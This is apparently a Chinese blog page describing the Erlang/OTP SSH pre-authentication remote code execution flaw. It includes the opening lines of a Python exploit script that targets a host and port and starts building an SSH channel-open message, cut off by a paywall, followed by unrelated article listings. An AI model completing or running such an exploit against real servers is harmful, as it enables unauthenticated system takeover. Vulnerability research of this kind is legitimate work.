Erlang-OTP SSH服务器存在rce漏洞

最新推荐文章于 2025-08-12 10:36:06 发布
原创 最新推荐文章于 2025-08-12 10:36:06 发布 · 325 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#erlang #安全 #web安全 #漏洞复现 #漏洞利用 #网络安全

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

Erlang/OTP SSH 服务器在 SSH 连接早期处理协议消息的方式缺陷导致的。通常情况下,SSH 服务器会等待用户完成身份验证,然后才会接受和处理某些类型的消息,尤其是那些请求访问命令执行权限的消息。然而,由于 Erlang/OTP 实现中缺少一项检查,因此有可能在完成身份验证之前发送特定的 SSH 消息,服务器会错误地将其处理为用户已通过验证。

利用脚本

import socket
import struct
import time

HOST = "127.0.0.1"  # Target IP (change if needed)
PORT = 2222  # Target port (change if needed)


# Helper to format SSH string (4-byte length + bytes)
def string_payload(s):
    s_bytes = s.encode("utf-8")
    return struct.pack(">I", len(s_bytes)) + s_bytes


# Builds SSH_MSG_CHANNEL_OPEN for session
def build_channel_open(channel_id=0):
    return (
        b"\x5a"  # SSH_MSG_CHANNEL_OPEN
        + string_payloa
最低0.47元/天 解锁文章
Goby 漏洞安全通告| Erlang/OTP SSH服务器 代码执行漏洞(CVE-2025-32433)
m0_46699477的博客
04-25 802
CVE-2025-32433:Erlang/OTP SSH实现中存在一个高风险关键安全漏洞(CVSS评分10分),允许攻击者通过SSH协议消息处理缺陷在未经身份验证的情况下执行任意代码。
erlang-otp-win64位 25.3版本
06-19
在Windows操作系统上,Erlang OTP通常提供为预编译的64位版本,如"erlang-otp-win64位 25.3版本",这确保了它能在Windows 64位环境下高效运行。 Erlang OTP(Open Telephony Platform)是一个开放源码的软件框架,...
Erlang实现ssh
The__one的专栏
06-25 2310
使用OTP库中的ct_ssh模块可以实现ssh的登录、执行命令、和文件读写1、新建一个ssh的配置文件ssh.config{mynode,[          {ssh,"192.168.1.179"},          {username,"root"},          {password,"root"}]}. 2、加载配置文件1> ct:insta
erlang 利用 ssh 远程执行 shell 命令
weixin_34109408的博客
09-04 557
2019独角兽企业重金招聘Python工程师标准>>> ...
[Erlang危机](4.3)SSH守护进程
Sunface撩技术
11-09 3187
原创文章,转载请注明出处:服务器非业余研究http://blog.youkuaiyun.com/erlib 作者Sunface联系邮箱:cto@188.comSSH DaemonErlang/OTP comes shipped with an SSH implementation that can both act as a server and a client. Part of it is a demo
分布式Erlang/OTP(学习笔记)(一)
m0_62961827的博客
01-18 2325
当一台机器上的Erlang节点试图与某远程节点通信时,本地的EPMD就会联络远程机器上的EPMD(默认使用TCP/IP,端口为4369),询问在远程机器上有没有叫相应名字的节点。请注意,Erlang默认的分布式模型基于这样一个假设,那就是集群中的所有节点都运行在一个受信网络内。当跨计算机通信的门槛不再那么陡峭,你终将获得翻越它的力量,并将之看作是习以为常的事情-─除非是出于某些特殊原因,否则你的进程完全可以运行在相互独立的多台机器上,这时你便可以开始设计在以前看来复杂得超乎想象的系统了。
Erlang-otp_win64_23.0.zip
06-07
总结来说,"Erlang-otp_win64_23.0.zip"提供的Erlang OTP 23.0版本是安装RabbitMQ所必需的前置条件,尤其对于Windows 64位用户而言。这个版本包含了运行RabbitMQ所需的所有组件,并且进行了优化,能够提供一个稳定且...
erlang-otp_win64_23.0.zip
07-16
此版本为window64位下的,erlang23版本,erlang-otp_win64_23.0,官网原包,官网太难找了,好不容易找到,和大家分享下,需要的可以下载,也作为自己的一个记录吧,自己亲测很好用,erlang环境需要与对应的rabbitmq...
【补补漏洞吧 | 01】等保测评OpenSSH漏洞补漏方法
木子Linux的博客世界
10-29 734
OpenSSH高危漏洞、中危漏洞的补漏方法
守护数字生命线:从Erlang/OTP高危漏洞看开源治理的必要性(附受影响开源项目表)
weixin_60602539的博客
04-22 1412
近日,Erlang/OTP SSH组件曝出编号为CVE-2025-32433的致命漏洞,CVSS评分高达10.0分,成为2025年最具破坏力的安全事件之一。攻击者无需任何身份认证,仅需发送特制的SSH协议消息即可远程执行任意代码,若SSH守护进程以root权限运行(常见于电信设备、工业控制系统等场景),攻击者可直接接管整个系统。
sshrpc:Erlang SSH RPC 模块(实验性)
07-01
sshrpc 这是 sshrpc,一组用于 Erlang RPC over SSH 的实验性模块。 警告:此代码不应用于生产系统。 有关详细信息,请参阅src/readme.txt 。 此代码在下获得。 感谢以下人员对本项目的帮助: Dave Smith(在 dizzyd.com,特别是他的 SDIST 论文) Erlang Solutions 的 Francesco Cesarini Erlang Solutions 的 Ulf Wiger 感谢对该项目的组织支持: 允许将我的 Erlang Factory 幻灯片作为此发行版的一部分的 Erlang 解决方案 NSIRG, NICT, 日本
erlang趣事六erlangshell ssh登陆
养码青年
03-09 1026
当我们远程登陆的时候,很多时候都是用远程工具。 今天我看到可以直接用erlang  shell ssh登陆就可以。 6> ssh:shell("192.168.80.2",22,[{user,"root"}]). New host 192.168.80.2 accept [y/n]?y ssh password: Last login: Thu Mar 10 00:53:27 2016
Erlang/OTP 开源项目入门指南及常见问题解决方案
gitblog_09176的博客
09-13 499
Erlang/OTP 开源项目入门指南及常见问题解决方案 【免费下载链接】otp Erlang/OTP 项目地址: https://gitcode.com/gh_mirrors/ot/otp ...
分布式的Erlang/OTP介绍
张贵宾的技术专栏
02-28 684
分布式的Erlang/OTP介绍 guibin.beijing@gmail.com Erlang仅仅能在具有相同的magic cookie系统之间的直接对话。如果想要在几台机器之间运行相互通信的Erlang程序,最简单的方法就是放置一个名叫".erlang.cookie"的文件在每个机器的$HOME目录里,并且把该文件的权限设置为400,该文件的内容即cookie名字。400权限意味着该文...
研究人员发现Erlang/OTP SSH远程代码执行漏洞攻击激增,70%针对工控防火墙
最新发布
FreeBuf_的博客
08-12 483
工控防火墙遭Erlang/OTP漏洞大规模攻击,70%目标为关键设施。
Erlang/OTP 快速安装指南
gitblog_01160的博客
03-31 998
`kerl` 是一个用于轻松构建和安装 Erlang/OTP 实例的开源项目。它旨在提供一个跨壳(shell)的工具,其依赖项仅为 `curl` 和 `git`。`kerl` 允许用户快速安装特定版本的 Erlang/OTP,而无需每次都完整地重建,大大提高了安装效率。 主要编程语言:Erlang ## 2. 项目使用的关键技术和框架 - **POSIX Shell 脚本**:`kerl` ...
ErlySSH: 并行SSH执行工具指南
gitblog_00279的博客
08-07 432
ErlySSH: 并行SSH执行工具指南 1. 项目介绍 ErlySSH,一个基于Erlang编写的Linux命令行工具,允许用户通过SSH客户端同时连接到大量服务器并并行地在每一个连接的服务器上执行非交互式的shell命令。它特别适合于系统管理员或DevOps工程师管理集群环境时,进行批量操作。ErlySSH要求OpenSSH客户端支持代理转发功能,以及GNU libreadline库,运行在L...
erlang 接入远程shell控制台
ve12345的博客
02-16 372
erlang shell是用户与 erlang 运行时系统交互的界面程序。事实上,erlang VM的运行不依赖任何shell,只要在启动的时候添加参数detached就可以脱离终端。 -detached Starts the Erlang runtime system detached from the system console. Useful for running daemons a...
erlang实现ssh
weixin_34388207的博客
10-12 204
借鉴自http://blog.youkuaiyun.com/the__one/article/details/6567443和http://blog.yufeng.info/archives/1509    单命令启动 ct_run -shell -logdir ./logs -config ./sshdemo.config   交互模式启动 %%ct是common_test模块的缩写...
掌握Erlang-OTP并发编程:实战源代码剖析
综上所述,Erlang-OTP并发编程实战源代码将涉及一系列复杂而深入的概念,这些概念对于想要成为高级Erlang开发者的中级程序员来说是非常宝贵的。通过阅读和分析这些源代码,中级程序员可以学习到如何应用ErlangOTP...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值